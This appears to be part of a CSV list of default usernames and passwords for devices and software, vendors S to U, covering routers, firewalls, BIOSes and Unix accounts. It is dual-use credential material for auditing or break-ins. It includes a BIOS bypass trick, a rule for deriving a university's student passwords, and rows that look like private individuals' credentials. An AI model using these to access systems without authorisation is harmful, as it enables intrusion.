AWBR,,,admin,,,, +smc,Barricade 7004 AWBR,,Admin,admin,,,, +smc,Barricade 7004ABR,,,,0000,Admin,, +smc,Barricade 7004AWBR,,Multi,admin,,Admin,192.168.123.254 (WiFi AP), +smc,Barricade 7004VBR,V.2,,,smcadmin,Admin,, +smc,Barricade 7004VWBR,,Multi,,,Admin,Connect to 192.168.2.1 or 192.168.2.1:88, +smc,Barricade 7204BRB,,HTTP,admin,smcadmin,Admin,, +smc,Barricade Router,,,Admin,Barricade,,, +smc,Barricade Router,,7004ABR,,0000,,, +smc,Barricade Routers,,,Admin,Barricade,Admin,, +smc,Modem/Router,,HTTP,cusadmin,highspeed,Customer Admin,Comcast Commercial High Speed Modem model number 8013WG, +smc,Modem/Wireless Router,,http://192.168.0.1,cusadmin,password,root,, +smc,Router,,Admin,admin,admin,,, +smc,Router,,All,admin,admin,,, +smc,Router,All,HTTP,admin,admin,Admin,, +smc,Router/Modem,BR7401,Multi,admin,barricade,Admin,, +smc,SMB2804WBR,V2,Multi,Administrator,smcadmin,Admin,, +smc,SMC broadband router,,HTTP,admin,admin,Admin,, +smc,SMC2304 Router,,,,smcadmin,,, +smc,SMC2304WBR-AG,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMC2404 Router,,,,smcadmin,,, +smc,SMC2652W,,,default,WLAN_AP,Admin,, +smc,SMC2804 Router,,,,smcadmin,,, +smc,SMC2804WBR,,HTTP,admin,smcadmin,Admin,, +smc,SMC2804WBR,v.1,HTTP,,smcadmin,Admin,, +smc,SMC2804WBRP-G,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMC2804WBRP-G,BARRICADE g,192.168.2.1,,,house hold names,, +smc,SMC7004VBR,,http://192.168.2.1,,,Administration,, +smc,SMC7904BRA,,Multi,,smcadmin,Admin,, +smc,SMC7904BRA,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMC7904WBRA,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMC7908VoWBRA,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMC8014,1B,http://192.168.0.1,cusadmin,password,user,Brighthouse CFL, +smc,SMC8014W-G,2A,http://192.168.0.1,cusadmin,password,Admin,This is a Cable Modem / Wireless Router., +smc,SMCBR14UP,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCBR14VPN,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCBR18VPN,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCBR24Q,,http://192.168.2.1,smcadmin,smcadmin,Administration,, +smc,SMCD3G-CCR,,http://10.1.10.1,cusadmin,highspeed,admin,Comcast small business modem, +smc,SMCWBR-14N,,http://192.168.2.1,admin,smcadmin,,, +smc,SMCWBR14-G,,HTTP,,smcadmin,Admin,mentioned password (no passwd) on your webpage is wrong, +smc,SMCWBR14-G,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCWBR14-GM,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCWBR14-N2,,http:192.168.2.1,Admin,smcadmin,Admin,, +smc,SMCWBR14T-G,,http://192.168.2.1,,smcadmin,Administration,, +smc,SMCWEBT-G,,http://192.168.2.25,,smcadmin,Administration,, +smc,WiFi Router,All,HTTP,,smcadmin,Admin,model #2804WBRP-G, +smc,Wireless Router 2655W,,Initial Password,None Needed,MiniAP,,, +smc,Wireless Router 2655W,1.4h.9,HTTP,None Needed,MiniAP,Initial Password,, +smc,all models,all versions,cable,,highspeed,user,, +smc,smcwbr14-3gn,,192.168.2.1.,admin,smcadmin,,, +smc,wbr14-3gn,,192.168.2.1.,admin,123465,,, +smith & bentzen,InstantWebMail (IWM),,,username,password,,, +smithbentzen,Instant Web Mail (IWM),,http,username,password,,, +snapgear,Pro, Lite, and SOHO,1.79 +,Multi,root,default,Admin,Before 1.79 no user name req., +snapgear,SnapGear,,,root,default,,, +snapgear,SnapGear,,Multi,root,default,,, +snapgear,firewall,,Multi,root,admin,tcp-ip,, +snapgear,firewall,,tcp-ip,root,admin,,, +snom,320,,http,Administrator,0000,,, +snom,360,,http,Administrator,0000,,, +softwarehouse,CCURE Access Control System,(all),Console,manager,manager,Admin,, +softwarehouse,CCURE Access Control System,,Admin,manager,manager,,, +soho,nbg800,,,admin,1234,,unknown, +solution6,Viztopia Accounts,,Multi,aaa,often blank,Admin,, +sonicwall,ALL,,ALL,admin,password,,, +sonicwall,ALL,,Admin,admin,password,,, +sonicwall,Any Firewall Device,,,admin,password,,, +sonicwall,Firewall,,,admin,password,,, +sonicwall,Firewall,,HTTP,admin,password,root,, +sonicwall,Firewall,,root,admin,password,,, +sonicwall,Most UTM Devices (TZ/PRO/NSA),,http://192.168.168.168:80/,admin,password,,, +sonicwall,SOHO TELE TZ and PRO,,,admin,password,,, +sonicwall,TZ 190,,Https://10.10.10.206,admin,,,, +sonicwall,TZ1000,1.03,,admin,depp,,, +sonicx,SonicAnime,on,Telnet,root,admin,Admin,1.0101E+14, +sony,Network Camera SNC-RZ30,,,admin,admin,,, +sony,Network Camera SNC-RZ30,,HTTP,admin,admin,,, +sonyericsson,T290i,,,,0000,default to reset the phone,, +sonyericsson,T68i,,,,0000,default to reset the phone,, +sonyericsson,sony ericsson xperia,x1,,apex,ccg425,,, +sophiaschweizag,Protector,,HTTPS,admin,Protector,Admin,, +sophiaschweizag,Protector,,SSH,root,root,Admin,, +sorenson,SR-200,,HTTP,,admin,Admin,, +sourcebycircuitcity,In-Store Demo Windows Screen Savers,,,,,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book., +sourcefire,RNA Sensor,,,admin,password,,, +sourcefire,RNA Sensor,,,root,password,,, +sourcefire,RNA Sensor,,http,admin,password,Admin,, +sourcefire,RNA Sensor,,ssh/console,root,password,Admin,, +sovereign hill,InQuery,,,Admin,shs,,, +sovereignhill,InQuery,,,Admin,shs,Admin,, +soyo,PC BIOS,,console,,SY_MB,Admin,, +speco,CCTV Digital Video Recorder,all,web interface,admin,1234,admin operator,, +speco,CCTV Digital Video Recorder,all,web interface,user,4321,viewing user,, +speedstream,5660,,Telnet,,adminttd,Admin,, +speedstream,5667,R4.0.1 ,HTTP,,admin,Admin,, +speedstream,5861 SMT Router,,,admin,admin,,, +speedstream,5861 SMT Router,,Admin,admin,admin,,, +speedstream,5861 SMT Router,,Multi,admin,admin,Admin,, +speedstream,5871 IDSL Router,,,admin,admin,,, +speedstream,5871 IDSL Router,,Admin,admin,admin,,, +speedstream,5871 IDSL Router,,Multi,admin,admin,Admin,, +speedstream,DSL,,,admin,admin,,, +speedstream,DSL,,Admin,admin,admin,,, +speedstream,DSL,,Multi,admin,admin,Admin,, +speedstream,Router 250 ssr250,,,admin,admin,,, +speedstream,Router 250 ssr250,,Admin,admin,admin,,, +speedstream,Router 250 ssr250,,Multi,admin,admin,Admin,, +speedxess,HASE-120,,,,speedxess,,, +speedxess,HASE-120,,Admin,,speedxess,,, +speedxess,HASE-120,,Multi,,speedxess,Admin,, +spider systems,M250,,,,hello,,, +spidersystems,M250,,,,hello,,, +spike,CPE,,,enable,,,, +spike,CPE,,Admin,enable,,,, +spike,CPE,,Console,enable,,Admin,, +sprint,PCS,,Other,self,system,remote voicemail,, +sprint,pcs,,remote voicemail,self,system,,, +ssangyoung,SR2501,,,,2501,,, +stratitec,TimeIPS,,root,root,ahetzip8,,, +stratitec,TimeIPS,All,Console,root,ahetzip8,root,, +sun,,,,root,,,SunOS 4.1.4, +sun,Cobalt,,HTTP,admin,admin,Admin,, +sun,E10000 System Service Processor,,multi,ssp,ssp,Admin,, +sun,JavaServer,,,admin,admin,,, +sun,JavaWebServer,,1.x 2.x,admin,admin,,, +sun,JavaWebServer,,Admin,admin,admin,,, +sun,JavaWebServer,1.x 2.x,AdminSrv,admin,admin,Admin,, +sun,Sun E10000 System Service Processor,,,ssp,ssp,,, +sun,SunOS,,,root,t00lk1t,,, +sun,SunOS,,,root,t00lk1t,Admin,, +sun,SunScreen,,3.1 Lite,admin,admin,,, +sun,SunScreen,3.1 Lite,http (with java) port 3852,admin,admin,Admin,, +sun,many,,,root,sun123,,, +sun,many,,Other,root,sun123,,, +sunmicrosystems,ILOM of X4100,1,HTTP,root,changeme,Admin,, +supermicro,PC BIOS,,,,ksdjfg934t,,, +supermicro,PC BIOS,,Admin,,ksdjfg934t,,, +supermicro,PC BIOS,,Console,,ksdjfg934t,Admin,, +surecom,EP3501/3506,,,admin,surecom,,own os, +surecom,Unknown,,,admin,surecom,,, +surecom,Wireless Broadband Router 11Mbps,,,admin,admin,Administrator,, +suse gmbh,Emailserver,,1.x,root,root,,, +suse gmbh,Emailserver,,Admin,root,root,,, +susegmbh,Emailserver,1.x,Telnet,root,root,Admin,, +sweex,,,,sweex,mysweex,,, +sweex,Broadband Router,,Admin,,blank,,, +sweex,Broadband Router,LB000020,HTTP,,blank,Admin,, +sweex,LW055,,192.168.55.1,sweex,mysweex,admin,, +sweex,MO200,,http://192.168.200.1,sweex,mysweex,,, +swissvoice,IP 10S,,Telnet,target,password,Admin,, +sybase (datev),Adaptive Server Enterprise,,12,sa,sasasa,,, +sybase (datev),Adaptive Server Enterprise,,Admin,sa,sasasa,,, +sybase,Adaptive Server Enterprise,,,12.x,,,, +sybase,Adaptive Server Enterprise,,11.x 12.x,sa,,,, +sybase,Adaptive Server Enterprise,,SA and SSO roles,sa,,,, +sybase,Adaptive Server Enterprise,11.x 12.x,Multi,sa,,SA and SSO roles,, +sybase,EAServer,,HTTP,jagadmin,,Admin,Source : Manufactor documentation, +sybase,Sybase,,8,DBA,SQL,,, +sybase,Sybase,,Admin,DBA,SQL,,, +sybase,Sybase,8.0,Multi,DBA,SQL,Admin,, +sybasedatev,Adaptive Server Enterprise,12.0,Multi,sa,sasasa,Admin,, +symantec,Brightmail Anti-Spam,,,root,brightmail,,, +symantec,NAV CORP / ALL,,,admin,symantec,,, +symantec,NAV CORP / ALL,,Admin,admin,symantec,,, +symantec,NAV CORP / ALL,,HTTP,admin,symantec,Admin,, +symantec,Norton Antivirus Corp Ed.,,Admin,,symantec,,, +symantec,Norton Antivirus Corp Ed.,,all,,symantec,,, +symantec,Norton Antivirus Corp Ed.,all,Multi,,symantec,Admin,, +symantec,VPN-Firewall,,,admin,,,, +symantec,VPN/Firewall Appliance,100/200,http,admin,,Admin,, +symbol,AP-2412,,Multi,,Symbol,Admin,2Mbps FH AccessPoint, +symbol,AP-3020,,Multi,,Symbol,Admin,2Mbps FH AccessPoint, +symbol,AP-4111,,Multi,,Symbol,Admin,11Mbps DS AccessPoint, +symbol,AP-4121,,Multi,,Symbol,Admin,11Mbps DS AccessPoint, +symbol,AP-4131,,Multi,,Symbol,Admin,11Mbps DS AccessPoint, +symbol,AP-5131,,Multi,admin,motorola,https,, +symbol,Spectrum 24 Access Point,,,Symbol,Symbol,,, +symbol,Spectrum 24 Access Point,,HTTP,Symbol,Symbol,,, +symbol,Spectrum 24 Access Point,,http,symbol,Symbol,Admin,, +symbol,Spectrum,series 4100-4121,HTTP,,Symbol,Admin,Access Point Wireless, +symbol,ap5131,,,admin,symbol,,, +syskonnect,6616,,,default.password,,,, +system32,VOS,,Multi,install,secret,Admin,, +tandberg,Border Controller,,Telnet/ssh/http,admin,TANDBERG,Admin,, +tandberg,DLT8000 Autoloader 10x,,Console,,10023,Maintenance,, +tandberg,Gatekeeper,,,admin,TANDBERG,Admin,, +tandberg,TANDBERG,,8000,,TANDBERG,,, +tandberg,Tandberg,8000,Multi,,TANDBERG,Admin,http://www.tandberg.net/collateral/user_manuals/TANDBERG_8000_UserMan.pdf, +tandem,TACL,,Multi,super.super,,Admin,, +tandem,TACL,,Multi,super.super,master,Admin,, +tasman,T1,1000 Series,console,Tasman,Tasmannet,Admin,, +tasman,T1,4000 Series,console,Tasman,Tasmannet,Admin,, +tasman,T1,6000 Series,console,Tasman,Tasmannet,Admin,, +tasman,T1,7000 Series,console,Tasman,Tasmannet,Admin,, +tcomfort,Routers,,HTTP,Administrator,,Admin,, +teamxodus,XeniumOS,2.3,FTP,xbox,xbox,Admin,, +tecom,Titan,,admin,TECOM MASTER,4346,,, +tecom,Titan,2.06,Other,TECOM MASTER,4346,admin,, +tekelec,Eagle STP,,,eagle,eagle,,, +teklogix,Accesspoint,,Multi,Administrator,,Admin,, +telappliant,IP2006 SIP Phone,,http,admin,1234,Admin,, +telcosystems,Edge Link 100,,Console,telco,telco,telco,, +telebit,Netblazer,,,setup,setup,,, +telebit,Netblazer,,,snmp,nopasswd,,, +telebit,netblazer 3.*,,,setup,setup,,, +telebit,netblazer 3.*,,,snmp,nopasswd,,, +telecomnz,Nokia M10,,,Telecom,Telecom,,, +teledat,Routers,,HTTP,admin,1234,Admin,, +telelec,Eagle,,,eagle,eagle,,, +teletronics,WL-CPE-Router,3.05.2,HTTPS,admin,1234,Admin,, +telewell,TW-EA200,,Multi,admin,password,Admin,, +telewell,TW-EA510,,http://192.168.0.254,admin,admin,Admin,, +telindus,1124,,HTTP,,,Admin,, +telindus,SHDSL1421,yes,HTTP,admin,admin,Admin,, +telindus,telindus,2002,Telnet,admin,admin,Admin,, +tellabs,7120,,Multi,root,admin_1,Admin,telnet on port 3083, +tellabs,Titan 5500,,Admin,tellabs,tellabs#1,,, +tellabs,Titan 5500,,FP 6.x,tellabs,tellabs#1,,, +tellabs,Titan 5500,FP 6.x,Multi,tellabs,tellabs#1,Admin,, +teltronic s.a.u.,NEBULA,,,admin,tetra,,, +telus,Telephony Services,,,(created),telus00,,, +telus,Telephony and internet services,,,(username),telus00,User,Initial password if issued in 2000, +telus,Telephony and internet services,,,(username),telus01,User,Initial password if issued in 2001, +telus,Telephony and internet services,,,(username),telus02,User,Initial password if issued in 2002, +telus,Telephony and internet services,,,(username),telus03,User,Initial password if issued in 2003, +telus,Telephony and internet services,,,(username),telus04,User,Initial password if issued in 2004, +telus,Telephony and internet services,,,(username),telus05,User,Initial password if issued in 2005, +telus,Telephony and internet services,,,(username),telus06,User,Initial password if issued in 2006, +telus,Telephony and internet services,,,(username),telus07,User,Initial password if issued in 2007, +telus,Telephony and internet services,,,(username),telus08,User,Initial password if issued in 2008, +telus,Telephony and internet services,,,(username),telus09,User,Initial password if issued in 2009, +telus,Telephony and internet services,,,(username),telus99,User,Initial password if issued in 1999, +teradyne,4TEL,VRS400,DTMF,(last 5 digits of lineman's SSN),(same as user ID),,, +terayon,,,,admin,nms,,6.29, +terayon,TeraLink 1000 Controller,,,admin,password,,, +terayon,TeraLink 1000 Controller,,,user,password,,, +terayon,TeraLink Getaway,,,admin,password,,, +terayon,TeraLink Getaway,,,user,password,,, +terayon,TeraLink,,,admin,password,,, +terayon,Unknown,Comcast-supplied,HTTP,,,diagnostics page,192.168.100.1/diagnostics_page.html, +textportal,TextPortal,,,god1,12345,,, +textportal,TextPortal,,,god2,12345,,, +thomson,,,,D8AA0,12345678,,, +thomson,585,7,192.168.254,,,admin,, +thomson,782i,,http://192.168.1.254,Administrator,CPE.hgw.12,Administrator,Made in Macedonia! BaDxBoY, +thomson,SpeedTouch ,,125.24.231.95,admin,suadmin,,, +thomson,SpeedTouch 530,,http://10.0.0.138,,,Administration,, +thomson,SpeedTouch 536,,http://192.168.1.254,Administrator,,Administration,, +thomson,SpeedTouch 546,,http://192.168.1.254 or http://speedtouch.lan,Administrator,,Administration,, +thomson,SpeedTouch 580,,http://192.168.1.254,Administrator,,Administration,, +thomson,SpeedTouch 585,,http://192.168.1.254,Administrator,,Administration,, +thomson,SpeedTouch 780 WL,SSID.SpeedTouchB,192.168.1.254,,,,, +thomson,SpeedTouch Home,,http://10.0.0.138,admin,admin,Administration,, +thomson,SpeedTouch Pro,,http://10.0.0.138,admin,admin,Administration,, +thomson,SpeedTouch261A3E,SpeedTouch585v6,,administrator,administrator,,, +thomson,SpeedTouch580,,,admin,admin,,, +thomson,SpeedTouch580,4.3.19,HTTP,admin,admin,,, +thomson,TG585,7,192.168.1.254,jalvarez,pc2119,Poniente 29,, +thomson,speed touch,780i wl,,szilizs,keszeg,,, +thomson,speedtouch 585V6,,,Admin,23698,,, +thomson,xp,all versions,http://192.168.1.254/,administrator,,administrator,, +tiara networks,(router???),,1400 6100 6200,,tiara,,, +tiara networks,(router???),,tiaranet,,tiara,,, +tiara,1400,3.x,Console,tiara,tiaranet,Admin,also known as Tasman Networks routers, +tiara,Tiara,,,tiara,tiaranet,,, +tiaranetworks,(router???),1400 6100 6200,Multi,,tiara,tiaranet,, +tim schaab,Mad.Thought,,2.0.1,theman,changeit,,, +timschaab,Mad.Thought,2.0.1,http,theman,changeit,Admin,, +tiny,PC BIOS,,,,Tiny,,, +tiny,PC BIOS,,Console,,Tiny,Admin,, +tinys,PC BIOS,,,,Tiny,,, +tinys,PC BIOS,,,,tiny,,, +tinys,PC BIOS,,Admin,,Tiny,,, +tmc,PC BIOS,,,,BIGO,,, +tmc,PC BIOS,,Admin,,BIGO,,, +tmc,PC BIOS,,Console,,BIGO,Admin,, +toplayer,AppSwitch 2500,,,siteadmin,toplayer,,Any, +toplayer,AppSwitch,,,siteadmin,toplayer,,, +topsec,firewall,,Multi,superman,talent,Admin,, +toshiba 8000,Laptop,,,,,,, +toshiba 8000,Laptop,,Admin,,,,, +toshiba,Most laptops,,console,,,,, +toshiba,PC BIOS,,,,24Banc81,,, +toshiba,PC BIOS,,,,toshy99,,, +toshiba,PC BIOS,,Admin,,24Banc81,,, +toshiba,PC BIOS,,Admin,,Toshiba,,, +toshiba,PC BIOS,,Admin,,toshy99,,, +toshiba,PC BIOS,,Console,,24Banc81,Admin,, +toshiba,PC BIOS,,Console,,Toshiba,Admin,, +toshiba,PC BIOS,,Console,,toshy99,Admin,, +toshiba,PC BIOS,notebooks,Floppy Drive,,4B 45 59 00 00,Admin,If the first 5 bytes of sector 1 of a floppy in drive A are 4B 45 59 00 00 then you can bypass the password by hitting enter when prompted for it (yes, +toshiba,TR-650,,,admin,tr650,,V2.01.00, +toshiba,Toshiba 8000 Laptop,,Multi,,,Admin,, +toshiba,eStudio,All versions,http://,admin,123456,admin,, +tp link,Tp link,,,admin,admin,,, +trend micro,InterScan VirusWall,,,admin,admin,,, +trend micro,Trend Micro,,,admin,admin,,, +trend micro,Viruswall,,Admin,admin,admin,,, +trend micro,Viruswall,,all versions,admin,admin,,, +trendmicro,,7.3,,admin,admin,,, +trendmicro,ISVW (VirusWall),,,admin,admin,,any, +trendmicro,Viruswall,all versions,HTTP on port 1812,admin,admin,Admin,, +trendnet,TEW 432 BRP,,HTTP://192.168.1.1,admin,admin,root,nothing, +trendnet,TEW-432BRB,432BRB,http://192.168.10.1,yarali,konya1,konya1,, +trendnet,TEW-432BRB,432BRB,http://192.168.10.1,yarali,konya1,konya1,konya, +trendnet,TEW-432BRP,,http://192.168.0.1,,,,, +trendnet,TEW-432BRP,TEW-432BRP,,hiua,xurxure,blank,, +trendnet,TEW-450APB,,,admin,admin,,, +trendnet,TEW-452BRP,,http://192.168.1.1,admin,admin,,, +trendnet,TEW-510APB,,http://192.168.1.250,,admin,,, +trendnet,TEW-511BRP,,http://192.168.1.1,,admin,,, +trendnet,TEW-631BRP,,http://192.168.1.1,admin,admin,,, +trendnet,TEW-639GR,,192.168.10.1,admin,payago,,, +trendnet,TEW-652BRP,H/W:V1.OR,HTTP://192.168.10.1,AMIN,ADMIN,ADMIN,, +trendnet,TK1601R,,,,00000000,,, +trendnet,TK1602R,,,,00000000,,, +trendnet,TK801R,,,,00000000,,, +trendnet,TK802R,,,,00000000,,, +trendnet,TPL110AP,,http://10.0.0.3,admin,admin,,, +trendnet,TRENDNET TEW411BRP,,198.162.1.1,,admin,Admin access,, +trendnet,TW100-BRF114,,http://192.168.0.1,,,,, +trendnet,TW100-BRV204,,,,,,, +trendnet,TW100-BRV304,,,,,,, +trendnet,TW100-S4W1CA,,http://192.168.1.1,,,,, +trendnet,tew-432brp,windows7,http://192.168.10,1,,admin,, +trendnet,tw100-s4w1ca,,http://192.168.0.1,admini,admini,admin,nnu stiu parola si numele vechi de la trendnet, +trintech,eAcquirer App/Data Servers,,,t3admin,Trintech,,, +trintech,eAcquirer,,,t3admin,Trintech,,, +triumphadler,DC2116,1.0,http://,admin,0000,admin,, +troy,ExtendNet 100zx,,Multi,admin,extendnet,Admin,dizphunKt, +tsunami,Tsunami-45,,,managers,managers,,, +tsunami,Tsunami-45,1.0,Multi,managers,managers,,, +tvt system,Expresse G5 DS1 Module,,,,enter,,, +tvt system,Expresse G5 DS1 Module,,Admin,,enter,,, +tvt system,Expresse G5,,,craft,,,, +tvt system,Expresse G5,,Admin,craft,,,, +tvtsystem,Expresse G5 DS1 Module,,Multi,,enter,Admin,, +tvtsystem,Expresse G5,,Multi,craft,,Admin,, +type3,Typo3,3.6,,admin,password,Admin,, +typo3,TYPO3,,3.6,admin,password,,, +unex,NexIP Routers,,,,password,,, +unex,NexIP Routers,,HTTP,,password,Admin,, +uniden,UIP1868P,,http://192.168.15.1,admin,UnidEn79!,Configuration,password is case sensitive, +uniden,UIP1869V,,http://192.168.15.1,admin,admin,,, +uniden,UIP300,,HTTP,user,123456,,, +uniden,WNR2004,,http://192.168.1.1,UNIDEN,,,, +unisys,ClearPath MCP,,Multi,ADMINISTRATOR,ADMINISTRATOR,Admin,, +unisys,ClearPath MCP,,Multi,HTTP,HTTP,Web Server Administration,, +unisys,ClearPath MCP,,Multi,NAU,NAU,Privileged,Network Administration Utility, +universityoftennessee,All Employee and Student Services,,, - See Notes,See Notes,Varies with account,Username based on email - eg. if email is smith123@tennessee.edu then NetID (username) is smith123. Def. Password composed of first two letters of birth month in lower case; last two digits of birth; last four digits of UT ID Number; eg. Born Feb 1979 and UT ID Number is 123-45-6789 - default password is fe796789, +unix,Generic,,,adm,,,, +unix,Generic,,,adm,adm,,, +unix,Generic,,,admin,admin,,, +unix,Generic,,,administrator,,,, +unix,Generic,,,administrator,administrator,,, +unix,Generic,,,anon,anon,,, +unix,Generic,,,bbs,,,, +unix,Generic,,,bbs,bbs,,, +unix,Generic,,,bin,sys,,, +unix,Generic,,,checkfs,checkfs,,, +unix,Generic,,,checkfsys,checkfsys,,, +unix,Generic,,,checksys,checksys,,, +unix,Generic,,,daemon,daemon,,, +unix,Generic,,,demo,,,, +unix,Generic,,,demo,demo,,, +unix,Generic,,,demos,,,, +unix,Generic,,,demos,demos,,, +unix,Generic,,,dni,,,, +unix,Generic,,,fal,,,, +unix,Generic,,,fal,fal,,, +unix,Generic,,,fax,fax,,, +unix,Generic,,,ftp,,,, +unix,Generic,,,ftp,ftp,,, +unix,Generic,,,games,games,,, +unix,Generic,,,gopher,gopher,,, +unix,Generic,,,gropher,,,, +unix,Generic,,,guest,,,, +unix,Generic,,,guest,guestgue,,, +unix,Generic,,,halt,,,, +unix,Generic,,,halt,halt,,, +unix,Generic,,,informix,informix,,, +unix,Generic,,,install,install,,, +unix,Generic,,,lp,,,, +unix,Generic,,,lp,lp,,, +unix,Generic,,,lpadm,lpadm,,, +unix,Generic,,,lpadmin,lpadmin,,, +unix,Generic,,,lynx,,,, +unix,Generic,,,mail,,,, +unix,Generic,,,mail,mail,,, +unix,Generic,,,man,man,,, +unix,Generic,,,me,,,, +unix,Generic,,,mountfs,mountfs,,, +unix,Generic,,,mountfsys,mountfsys,,, +unix,Generic,,,mountsys,mountsys,,, +unix,Generic,,,news,news,,, +unix,Generic,,,nobody,,,, +unix,Generic,,,nobody,nobody,,, +unix,Generic,,,nuucp,,,, +unix,Generic,,,operator,,,, +unix,Generic,,,operator,operator,,, +unix,Generic,,,oracle,,,, +unix,Generic,,,postmaster,postmast,,, +unix,Generic,,,powerdown,powerdown,,, +unix,Generic,,,rje,rje,,, +unix,Generic,,,root,root,,, +unix,Generic,,,setup,setup,,, +unix,Generic,,,shutdown,,,, +unix,Generic,,,shutdown,shutdown,,, +unix,Generic,,,sync,,,, +unix,Generic,,,sync,sync,,, +unix,Generic,,,sys,sys,,, +unix,Generic,,,sys,system,,, +unix,Generic,,,sysadm,admin,,, +unix,Generic,,,sysadm,sysadm,,, +unix,Generic,,,sysadmin,sysadmin,,, +unix,Generic,,,sysbin,sysbin,,, +unix,Generic,,,system_admin,,,, +unix,Generic,,,system_admin,system_admin,,, +unix,Generic,,,trouble,trouble,,, +unix,Generic,,,umountfs,umountfs,,, +unix,Generic,,,umountfsys,umountfsys,,, +unix,Generic,,,umountsys,umountsys,,, +unix,Generic,,,unix,unix,,, +unix,Generic,,,user,user,,, +unix,Generic,,,uucp,uucp,,, +unix,Generic,,,uucpadm,uucpadm,,, +unix,Generic,,,web,,,, +unix,Generic,,,web,web,,, +unix,Generic,,,webmaster,,,, +unix,Generic,,,www,,,, +unix,Generic,,Admin,adm,,,, +unix,Generic,,Admin,adm,adm,,, +unix,Generic,,Admin,bin,sys,,, +unix,Generic,,Admin,install,install,,, +unix,Generic,,Admin,mountfs,mountfs,,, +unix,Generic,,Admin,mountfsys,mountfsys,,, +unix,Generic,,Admin,mountsys,mountsys,,, +unix,Generic,,Admin,root,,,, +unix,Generic,,Admin,root,hp,,, +unix,Generic,,Admin,root,root,,, +unix,Generic,,Admin,setup,setup,,, +unix,Generic,,Admin,sys,bin,,, +unix,Generic,,Admin,sys,sys,,, +unix,Generic,,Admin,sys,system,,, +unix,Generic,,Admin,sysadm,admin,,, +unix,Generic,,Admin,sysadm,sysadm,,, +unix,Generic,,Admin,sysadmin,sysadmin,,, +unix,Generic,,Admin,sysbin,sysbin,,, +unix,Generic,,Admin,system_admin,,,, +unix,Generic,,Admin,system_admin,system_admin,,, +unix,Generic,,HP-UX,root,hp,,, +unix,Generic,,Multi,adm,,Admin,, +unix,Generic,,Multi,adm,adm,Admin,, +unix,Generic,,Multi,admin,admin,User,, +unix,Generic,,Multi,administrator,,User,, +unix,Generic,,Multi,administrator,administrator,User,, +unix,Generic,,Multi,anon,anon,User,, +unix,Generic,,Multi,bbs,,User,, +unix,Generic,,Multi,bbs,bbs,User,, +unix,Generic,,Multi,bin,sys,Admin,, +unix,Generic,,Multi,checkfs,checkfs,User,, +unix,Generic,,Multi,checkfsys,checkfsys,User,, +unix,Generic,,Multi,checksys,checksys,User,, +unix,Generic,,Multi,daemon,,User,, +unix,Generic,,Multi,daemon,daemon,User,, +unix,Generic,,Multi,demo,,User,, +unix,Generic,,Multi,demo,demo,User,, +unix,Generic,,Multi,demos,,User,, +unix,Generic,,Multi,demos,demos,User,, +unix,Generic,,Multi,dni,,User,, +unix,Generic,,Multi,dni,dni,User,, +unix,Generic,,Multi,fal,,User,, +unix,Generic,,Multi,fal,fal,User,, +unix,Generic,,Multi,fax,,User,, +unix,Generic,,Multi,fax,fax,User,, +unix,Generic,,Multi,ftp,,User,, +unix,Generic,,Multi,ftp,ftp,User,, +unix,Generic,,Multi,games,,User,, +unix,Generic,,Multi,games,games,User,, +unix,Generic,,Multi,gopher,gopher,User,, +unix,Generic,,Multi,gropher,,User,, +unix,Generic,,Multi,guest,,User,, +unix,Generic,,Multi,guest,guest,User,, +unix,Generic,,Multi,guest,guestgue,User,, +unix,Generic,,Multi,halt,,User,, +unix,Generic,,Multi,halt,halt,User,, +unix,Generic,,Multi,informix,informix,User,, +unix,Generic,,Multi,install,install,Admin,, +unix,Generic,,Multi,lp,,User,, +unix,Generic,,Multi,lp,bin,User,, +unix,Generic,,Multi,lp,lineprin,User,, +unix,Generic,,Multi,lp,lp,User,, +unix,Generic,,Multi,lpadm,lpadm,User,, +unix,Generic,,Multi,lpadmin,lpadmin,User,, +unix,Generic,,Multi,lynx,,User,, +unix,Generic,,Multi,lynx,lynx,User,, +unix,Generic,,Multi,mail,,User,, +unix,Generic,,Multi,mail,mail,User,, +unix,Generic,,Multi,man,,User,, +unix,Generic,,Multi,man,man,User,, +unix,Generic,,Multi,me,,User,, +unix,Generic,,Multi,me,me,User,, +unix,Generic,,Multi,mountfs,mountfs,Admin,, +unix,Generic,,Multi,mountfsys,mountfsys,Admin,, +unix,Generic,,Multi,mountsys,mountsys,Admin,, +unix,Generic,,Multi,news,,User,, +unix,Generic,,Multi,news,news,User,, +unix,Generic,,Multi,nobody,,User,, +unix,Generic,,Multi,nobody,nobody,User,, +unix,Generic,,Multi,nuucp,,User,, +unix,Generic,,Multi,operator,,User,, +unix,Generic,,Multi,operator,operator,User,, +unix,Generic,,Multi,oracle,,User,, +unix,Generic,,Multi,postmaster,,User,, +unix,Generic,,Multi,postmaster,postmast,User,, +unix,Generic,,Multi,powerdown,powerdown,User,, +unix,Generic,,Multi,root,,Admin,, +unix,Generic,,Multi,root,root,Admin,, +unix,Generic,,Multi,setup,setup,Admin,, +unix,Generic,,Multi,shutdown,,User,, +unix,Generic,,Multi,shutdown,shutdown,User,, +unix,Generic,,Multi,sync,,User,, +unix,Generic,,Multi,sync,sync,User,, +unix,Generic,,Multi,sys,bin,Admin,, +unix,Generic,,Multi,sys,sys,Admin,, +unix,Generic,,Multi,sys,system,Admin,, +unix,Generic,,Multi,sysadm,admin,Admin,, +unix,Generic,,Multi,sysadm,sysadm,Admin,, +unix,Generic,,Multi,sysadmin,sysadmin,Admin,, +unix,Generic,,Multi,sysbin,sysbin,Admin,, +unix,Generic,,Multi,system_admin,,Admin,, +unix,Generic,,Multi,system_admin,system_admin,Admin,, +unix,Generic,,Multi,trouble,trouble,User,, +unix,Generic,,Multi,umountfs,umountfs,User,, +unix,Generic,,Multi,umountfsys,umountfsys,User,, +unix,Generic,,Multi,umountsys,umountsys,User,, +unix,Generic,,Multi,unix,unix,User,, +unix,Generic,,Multi,user,user,User,, +unix,Generic,,Multi,uucp,uucp,User,, +unix,Generic,,Multi,uucpadm,uucpadm,User,, +unix,Generic,,Multi,web,,User,, +unix,Generic,,Multi,web,web,User,, +unix,Generic,,Multi,webmaster,,User,, 